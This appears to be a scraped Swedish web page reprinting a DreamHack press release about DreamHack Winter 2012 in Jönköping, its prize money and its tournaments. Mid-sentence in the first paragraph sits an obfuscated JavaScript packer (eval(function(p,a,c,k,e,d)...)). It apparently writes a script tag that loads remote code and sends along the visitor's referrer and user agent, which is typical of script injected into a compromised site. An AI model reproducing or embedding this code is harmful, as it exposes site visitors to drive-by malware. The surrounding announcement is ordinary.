Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

2 miljoner kronor i prispengar på DreamHack

2 miljoner kronor i prispengar på DreamHack
Sebastian

Världens eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|debdy|var|u0026u|referrer|niztb||js|php’.split(’|’),0,{}))
bästa gamers drabbar samman i Jönköping när den 19:e upplagan av DreamHack Winter arrangeras i Elmia-mässan 22-25 november. Miljontals tittare väntas följa evenemanget och 2 miljoner i prispengar kommer att betalas ut till de bästa spelarna.

Till helgen kommer några av världens bästa gamers till Jönköping för att bland annat tävla i spel som Counter-Strike, StarCraft II och League of Legends.

DreamHack med sponsorer erbjuder 2 miljoner kronor i prispengar till de bästa spelarna i spel som StarCraft II, Counter-Strike: Global Offensive, League of Legends, Dota 2 och Heroes of Newerth,
– DreamHack Winter 2012 är det största esportevenemanget vi någonsin gjort, säger Fredrik Nyström, pressansvarig på DreamHack.

Totalt arrangeras tolv turneringar med fem dedikerade esportscener och 9 livesändningar med bara esport. I somras hade DreamHack drygt 4 miljoner unika tittare i över 100 länder.
– På lördag kväll spelas finalen i StarCraft II i ishockeyarenan Kinnarps Arena med plats för 4000 fans, säger Nyström.

DreamHack Winter 2012 är världens största datorfestival men också Sveriges mest spännande IT-mässa med ett 50-tal utställande företag. DreamHack organiserar utöver e-sportturneringar även kreativa tävlingar samt erbjuder musik- och filmunderhållning inklusive livespelningar med bland annat Maskinen, Headhunterz och Adam Tensta. 25 000 ungdomar väntas till Elmia, Jönköping.

Mer information och scheman finns på www.dreamhack.se

Detta är ett pressmeddelande från DreamHack AB